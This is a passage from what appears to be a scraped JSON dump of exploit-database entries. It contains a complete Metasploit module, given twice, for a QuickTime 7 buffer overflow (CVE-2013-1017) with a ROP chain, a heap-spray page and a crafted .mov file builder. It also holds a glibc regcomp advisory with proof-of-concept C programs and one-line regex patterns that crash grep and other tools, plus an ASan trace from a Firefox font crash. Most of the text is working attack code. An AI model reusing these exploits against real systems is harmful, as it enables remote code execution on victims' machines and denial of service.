fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd\r\n 0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd\r\n 0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00\r\n 0x0c087fff9b90: fa fa 00 00 
00 00 00 fa fa fa fd fd fd fd fd fa\r\n 0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa\r\n 0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==1315==ABORTING\r\n--- cut ---\r\n \r\nThe bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39863.zip\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26025"}, {"lastseen": "2018-04-09T16:58:13", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "metasploit", "published": "2013-07-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdt", "title": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-07-22T00:00:00", "id": "1337DAY-ID-21017", "href": "https://0day.today/exploit/description/21017", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Apple Quicktime 7 
Invalid Atom Length Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple Quicktime. The flaw is\r\n triggered when Quicktime fails to properly handle the data length for certain\r\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\r\n overflow by loading a specially crafted .mov file, and allows arbitrary\r\n code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor\r\n 'Tom Gallagher', # Original Discovery (overlapped)\r\n 'Paul Bates', # Original Discovery (overlapped)\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1017' ],\r\n [ 'BID', '60097' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT5770' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # All of the following addresses are from Quicktime.qts\r\n # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET\r\n [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],\r\n [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],\r\n [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],\r\n [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\" # js_property_spray no like nilz\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 22 2013\"\r\n ))\r\n end\r\n \r\n def get_payload(t)\r\n p = ''\r\n \r\n rop =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN 
[msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n \r\n p << rop\r\n p << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n p << payload.encoded\r\n \r\n p\r\n end\r\n \r\n \r\n def targetable?(agent)\r\n if agent =~ /MSIE 8\\.0/ and agent =~ /Windows NT 5\\.1/\r\n return true\r\n elsif agent =~ /contype/\r\n # contype: a mov file request from Apple Quicktime\r\n return true\r\n end\r\n \r\n false\r\n end\r\n \r\n \r\n def get_html(t)\r\n js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))\r\n fake_mov_name = rand_text_alpha(4) + \".mov\"\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js_property_spray}\r\n \r\n var s = unescape(\"#{js_p}\");\r\n sprayHeap({shellcode:s});\r\n </script>\r\n </head>\r\n <body>\r\n <embed src=\"#{get_resource}/#{fake_mov_name}\" width=\"0\" height=\"0\"></embed>\r\n </body>\r\n </html>\r\n |\r\n \r\n html.gsub(/^\\t\\t/, '')\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n print_status(\"Requesting: #{request.uri}\")\r\n \r\n unless targetable?(agent)\r\n 
print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n print_status(\"Target selected as: #{target.name}\") if target\r\n \r\n if request.uri =~ /\\.mov$/\r\n print_status(\"Sending specially crafted .mov file\")\r\n send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })\r\n else\r\n html = get_html(target)\r\n send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })\r\n end\r\n end\r\n \r\n def sort_bytes(data)\r\n data.map { |e| [e].pack('N').scan(/../).reverse.join }.join\r\n end\r\n \r\n def rop_nop(t)\r\n [t['Nop']].pack('V*') # Ret (QuickTime.qts)\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(467) # 467 to align the pivot\r\n 10.times {\r\n buf << rop_nop(target)\r\n }\r\n buf << [\r\n target['Pop'], # POP ESP; RET (QuickTime.qts)\r\n 0x20302020 # Target value for ESP (our ROP payload)\r\n ].pack('V*')\r\n buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler\r\n buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot\r\n buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size\r\n \r\n # Quicktime File Format Specifications:\r\n # https://developer.apple.com/standards/qtff-2001.pdf\r\n mov = \"\\x00\\x00\\x06\\xDF\" # File size\r\n mov << \"moov\" # Movie atom\r\n mov << \"\\x00\\x00\\x06\\xD7\" # size (1751d)\r\n mov << \"rmra\" # Reference Movie atom\r\n mov << \"\\x00\\x00\\x06\\xCF\" # size (1743d)\r\n mov << \"rmda\" # rmda atom\r\n mov << \"\\x00\\x00\\x06\\xBF\" # size (1727d)\r\n mov << \"rdrf\" # Data reference atom\r\n mov << \"\\x00\\x00\\x00\\x00\" # size set to 0\r\n mov << \"alis\" # Data reference type: FS alias record\r\n mov << \"\\x00\\x00\\x06\\xAA\" # Size (1706d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\\x06\\x61\" # Size (1633d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x12\"\r\n mov << rand_text_alpha(81)\r\n mov << 
\"\\xFF\\xFF\"\r\n mov << rand_text_alpha(18)\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x26\" # Size (38d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x00\\x0F\\x00\\x0E\"\r\n mov << \"AA\" # Size (must be invalid)\r\n mov << rand_text_alpha(12)\r\n mov << \"\\x00\\x12\\x00\\x21\"\r\n mov << rand_text_alpha(36)\r\n mov << \"\\x00\"\r\n mov << \"\\x0F\\x33\"\r\n mov << rand_text_alpha(17)\r\n mov << \"\\x02\\xF4\" # Size (756h)\r\n mov << rand_text_alpha(756)\r\n mov << \"\\xFF\\xFF\\x00\\x00\\x00\"\r\n mov << buf\r\n \r\n @exploit = mov\r\n super\r\n end\r\nend\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21017"}, {"lastseen": "2018-01-11T01:21:20", "references": [], "edition": 2, "description": "This Metasploit module exploits a vulnerability found in Apple Quicktime. The flaw is triggered when Quicktime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the user.", "reporter": "metasploit", "published": "2013-07-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdt", "title": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1017"], "modified": "2013-07-19T00:00:00", "id": "1337DAY-ID-21009", "href": "https://0day.today/exploit/description/21009", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Apple Quicktime 7 Invalid Atom Length Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple Quicktime. The flaw is\r\n triggered when Quicktime fails to properly handle the data length for certain\r\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\r\n overflow by loading a specially crafted .mov file, and allows arbitrary\r\n code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor\r\n 'Tom Gallagher', # Original Discovery (overlapped)\r\n 'Paul Bates', # Original Discovery (overlapped)\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1017' ],\r\n [ 'BID', '60097' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT5770' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # All of the following addresses are from Quicktime.qts\r\n # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET\r\n [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],\r\n [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],\r\n [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],\r\n [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\" # js_property_spray no like nilz\r\n },\r\n 
'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 22 2013\"\r\n ))\r\n end\r\n\r\n def get_payload(t)\r\n p = ''\r\n\r\n rop =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n\r\n p << rop\r\n p << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n p << payload.encoded\r\n\r\n p\r\n end\r\n\r\n\r\n def targetable?(agent)\r\n if agent =~ /MSIE 8\\.0/ and agent =~ /Windows NT 5\\.1/\r\n return true\r\n elsif agent =~ /contype/\r\n # contype: a mov file request from Apple Quicktime\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n\r\n def get_html(t)\r\n js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))\r\n fake_mov_name = rand_text_alpha(4) + \".mov\"\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js_property_spray}\r\n\r\n var s = unescape(\"#{js_p}\");\r\n 
sprayHeap({shellcode:s});\r\n </script>\r\n </head>\r\n <body>\r\n <embed src=\"#{get_resource}/#{fake_mov_name}\" width=\"0\" height=\"0\"></embed>\r\n </body>\r\n </html>\r\n |\r\n\r\n html.gsub(/^\\t\\t/, '')\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n print_status(\"Requesting: #{request.uri}\")\r\n\r\n unless targetable?(agent)\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n print_status(\"Target selected as: #{target.name}\") if target\r\n\r\n if request.uri =~ /\\.mov$/\r\n print_status(\"Sending specially crafted .mov file\")\r\n send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })\r\n else\r\n html = get_html(target)\r\n send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })\r\n end\r\n end\r\n\r\n def sort_bytes(data)\r\n data.map { |e| [e].pack('N').scan(/../).reverse.join }.join\r\n end\r\n\r\n def rop_nop(t)\r\n [t['Nop']].pack('V*') # Ret (QuickTime.qts)\r\n end\r\n\r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(467) # 467 to align the pivot\r\n 10.times {\r\n buf << rop_nop(target)\r\n }\r\n buf << [\r\n target['Pop'], # POP ESP; RET (QuickTime.qts)\r\n 0x20302020 # Target value for ESP (our ROP payload)\r\n ].pack('V*')\r\n buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler\r\n buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot\r\n buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size\r\n\r\n # Quicktime File Format Specifications:\r\n # https://developer.apple.com/standards/qtff-2001.pdf\r\n mov = \"\\x00\\x00\\x06\\xDF\" # File size\r\n mov << \"moov\" # Movie atom\r\n mov << \"\\x00\\x00\\x06\\xD7\" # size (1751d)\r\n mov << \"rmra\" # Reference Movie atom\r\n mov << \"\\x00\\x00\\x06\\xCF\" # size (1743d)\r\n mov << \"rmda\" # rmda atom\r\n mov << \"\\x00\\x00\\x06\\xBF\" # size 
(1727d)\r\n mov << \"rdrf\" # Data reference atom\r\n mov << \"\\x00\\x00\\x00\\x00\" # size set to 0\r\n mov << \"alis\" # Data reference type: FS alias record\r\n mov << \"\\x00\\x00\\x06\\xAA\" # Size (1706d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\\x06\\x61\" # Size (1633d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x12\"\r\n mov << rand_text_alpha(81)\r\n mov << \"\\xFF\\xFF\"\r\n mov << rand_text_alpha(18)\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x26\" # Size (38d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x00\\x0F\\x00\\x0E\"\r\n mov << \"AA\" # Size (must be invalid)\r\n mov << rand_text_alpha(12)\r\n mov << \"\\x00\\x12\\x00\\x21\"\r\n mov << rand_text_alpha(36)\r\n mov << \"\\x00\"\r\n mov << \"\\x0F\\x33\"\r\n mov << rand_text_alpha(17)\r\n mov << \"\\x02\\xF4\" # Size (756h)\r\n mov << rand_text_alpha(756)\r\n mov << \"\\xFF\\xFF\\x00\\x00\\x00\"\r\n mov << buf\r\n\r\n @exploit = mov\r\n super\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21009"}, {"lastseen": "2018-03-01T23:45:34", "references": [], "edition": 2, "description": "Exploit for linux platform in category dos / poc", "reporter": "Maksymilian", "published": "2011-01-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "GNU libc/regcomp(3) Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-01-08T00:00:00", "id": "1337DAY-ID-15419", "href": "https://0day.today/exploit/description/15419", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n[ GNU libc/regcomp(3) Multiple Vulnerabilities ]\r\n \r\nAuthor: Maksymilian 
Arciemowicz\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\nDate:\r\n- - Dis.: 01.10.2010\r\n- - Pub.: 07.01.2011\r\n \r\nCERT: VU#912279\r\nCVE:\r\nCVE-2010-4051\r\nCVE-2010-4052\r\n \r\nAffected (tested):\r\n- - Ubuntu 10.10\r\n- - Slackware 13\r\n- - Gentoo 18.10.2010\r\n- - FreeBSD 8.1 (grep(1))\r\n- - NetBSD 5.0.2 (grep(1))\r\n \r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/93\r\n \r\nExploit for proftpd:\r\nhttp://cxib.net/stuff/proftpd.gnu.c\r\n \r\n \r\n- --- 0.Description ---\r\nThe GNU C library is used as the C library in the GNU system and most\r\nsystems with the Linux kernel.\r\n \r\n# define RE_DUP_MAX (0x7fff)\r\n \r\nregcomp() is used to compile a regular expression into a form that is\r\nsuitable for subsequent regexec() searches.\r\n \r\n \r\n- --- 1. RE_DUP_MAX overflow ---\r\nThe main problem exists in regcomp(3) function of GNU libc implementation.\r\nLet`s try understand..\r\n \r\n- ---\r\nint\r\nregcomp (preg, pattern, cflags)\r\nregex_t *__restrict preg;\r\nconst char *__restrict pattern;\r\nint cflags;\r\n{\r\n- ---\r\n \r\nif we use '{', token type will be OP_OPEN_DUP_NUM.\r\n \r\n- ---\r\n/* This function parse repetition operators like \"*\", \"+\", \"{1,3}\" etc.\r\n*/\r\n \r\nstatic bin_tree_t *\r\nparse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,\r\nre_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)\r\n{\r\nbin_tree_t *tree = NULL, *old_tree = NULL;\r\nint i, start, end, start_idx = re_string_cur_idx (regexp);\r\nre_token_t start_token = *token;\r\n \r\nif (token->type == OP_OPEN_DUP_NUM)\r\n{\r\nend = 0;\r\nstart = fetch_number (regexp, token, syntax); <===== CONVERT VALUE\r\n- ---\r\n \r\nlet`s see fetch_number =>\r\n \r\n- ---\r\nstatic int\r\nfetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)\r\n{\r\nint num = -1;\r\nunsigned char c;\r\nwhile (1)\r\n{\r\nfetch_token (token, input, syntax);\r\nc = token->opr.c;\r\nif (BE (token->type == END_OF_RE, 
0))\r\nreturn -2;\r\nif (token->type == OP_CLOSE_DUP_NUM || c == ',')\r\nbreak;\r\nnum = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)\r\n? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));\r\nnum = (num > RE_DUP_MAX) ? -2 : num;\r\n}\r\nreturn num;\r\n}\r\n- ---\r\n \r\nnow see regex.h to know, what value have RE_DUP_MAX\r\n \r\n- ---\r\n/* Maximum number of duplicates an interval can allow. Some systems\r\n(erroneously) define this in other header files, but we want our\r\nvalue, so remove any previous define. */\r\n# ifdef RE_DUP_MAX\r\n# undef RE_DUP_MAX\r\n# endif\r\n/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */\r\n# define RE_DUP_MAX (0x7fff)\r\n#endif\r\n- ---\r\n \r\ncalc_eclosure_iter() will call to calc_eclosure_iter() match time. and\r\ncrash in malloc(3). Simple Recursion.\r\n \r\nso we can't use value bigger 0x7fff in {n,}. regcomp(3) should return ERROR\r\nif we use more that one time '{' token.\r\n \r\nThey are many vectors attack\r\n \r\ngrep(1):\r\n[email\u00a0protected]:~$ ls |grep -E \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\npgrep(1):\r\n[email\u00a0protected]:~$ pgrep \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\nbregex from bacula-director-common\r\n[email\u00a0protected]:~$ bregex -f glob-0day.c\r\nEnter regex pattern: .*{10,}{10,}{10,}{10,}{10,}\r\nSegmentation fault\r\n \r\nwhatis(1):\r\n[email\u00a0protected]:~$ whatis -r \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\nand more like proftpd.\r\n \r\nSimple crash for CVE-2010-4051\r\n(gdb) x/i $rip\r\n=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)\r\n(gdb) x/i $eax\r\n0x2: Cannot access memory at address 0x2\r\n(gdb) x/i $rsp\r\n0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90\r\n(gdb) x/i 0x50($rsp)\r\nCannot access memory at address 0x7fffff5fef08\r\n \r\n \r\n#0 0x00007ffff7ad3ea2 in ?? () from /lib/libc.so.6\r\n#1 0x00007ffff7ad538e in malloc () from /lib/libc.so.6\r\n#2 0x00007ffff7b17d9b in ?? 
() from /lib/libc.so.6\r\n#3 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#4 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#5 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#6 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#7 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n...\r\n \r\n- ---PoC1---\r\n#include <regex.h>\r\n \r\nint main(){\r\nregex_t preg;\r\n \r\n// char fmt[]=\".*{10,}{10,}{10,}{10,}\"; // CVE-2010-4052\r\nchar fmt[]=\".*{10,}{10,}{10,}{10,}{10,}\"; CVE-2010-4051\r\n \r\nregcomp (&preg, fmt, REG_EXTENDED);\r\n \r\nreturn 0;\r\n}\r\n- ---PoC1---\r\n \r\n- --- 2. Stack Exhausion ---\r\nThis issue, may be also use to Denial of Service by stack exhausion\r\n \r\n#ls |grep -E \".*{10,}{10,}{111111,}\"\r\n \r\n- ---PoC2---\r\n#include <regex.h>\r\n \r\nint\r\nmain ()\r\n{\r\nregex_t preg;\r\n \r\nchar fmt[]=\".*{10,}{10,}{10,}{10,}\"; // CVE-2010-4052\r\n// char fmt[]=\".*{10,}{10,}{10,}{10,}{10,}\"; // CVE-2010-4051\r\n \r\nregcomp (&preg, fmt, REG_EXTENDED);\r\n \r\nreturn 0;\r\n}\r\n- ---PoC2---\r\n \r\nSuch a pattern may lead to allocate a large memory area, or large execution\r\ntime\r\n \r\nAs we can read in vsftpd/HACKING\r\n \r\n- ---\r\n- do not use libc features that are \"complicated\"\r\nand may contain security holes. For example, you probably shouldn't\r\ntry to use regcomp() to compile an untrusted regular expression.\r\nRegular expressions are just too complicated, and there are many\r\ndifferent libc's out there.\r\n- ---\r\n \r\nThat's true. But the worst implementation of lib C is GNU. There is a huge\r\ndifference using proftpd on NetBSD and Linux\r\n \r\n \r\n- --- 3. Stack Exhausions ---\r\nStack Exhausions was found in GNU glibc.\r\n \r\n- ---PoC3---\r\n/bin/egrep \"/(.*+++++++++++++++++++++++++++++(\\w+))/im\" cx\r\n- ---PoC3---\r\n \r\nwhen more '+' that more allocated memory. 
But let's see next one\r\n \r\n- ---PoC4---\r\n[email\u00a0protected]:~$ ulimit -m 100000\r\n[email\u00a0protected]:~$ ulimit -v 200000\r\n[email\u00a0protected]:~$ /bin/egrep \"/(.*+++++++++++++++++++++++++++++(\\w+))/im\" cx\r\nSegmentation fault\r\n[email\u00a0protected]:~$\r\n- ---PoC4---\r\n \r\nthe same command like in PoC 3, fails.\r\n \r\n(gdb) r \"/(.*++++++++++++++++++(\\w+))/im\" cx\r\nStarting program: /bin/egrep \"/(.*++++++++++++++++++(\\w+))/im\" cx\r\n/bin/egrep: Memory exhausted\r\n \r\nAdd one \"+\" more\r\n \r\nProgram exited with code 02.\r\n(gdb) r \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n \r\nStarting program: /bin/egrep \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n__libc_free (mem=0x7ffff720a010) at malloc.c:3709\r\n3709 if (chunk_is_mmapped(p)) /* release mmapped\r\nmemory. */\r\n(gdb) bt\r\n#0 __libc_free (mem=0x7ffff720a010) at malloc.c:3709\r\n#1 0x00007ffff7913431 in free_dfa_content (dfa=0x61f0c0) at regcomp.c:600\r\n#2 0x00007ffff7924e1c in re_compile_internal (preg=0x61f060, pattern=0x0,\r\n \r\nlength=140737488347176, syntax=<value optimized out>) at regcomp.c:823\r\n#3 0x00007ffff79256de in __re_compile_pattern (pattern=0x0,\r\nlength=<value optimized out>, bufp=0x7ffff720a010) at regcomp.c:231\r\n \r\n- ---malloc.c---\r\n...\r\nif (mem == 0) /* free(0) has no effect */\r\nreturn;\r\n \r\np = mem2chunk(mem);\r\n \r\n#if HAVE_MMAP\r\nif (chunk_is_mmapped(p))\r\n...\r\n- ---malloc.c---\r\n \r\nwhere\r\n#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 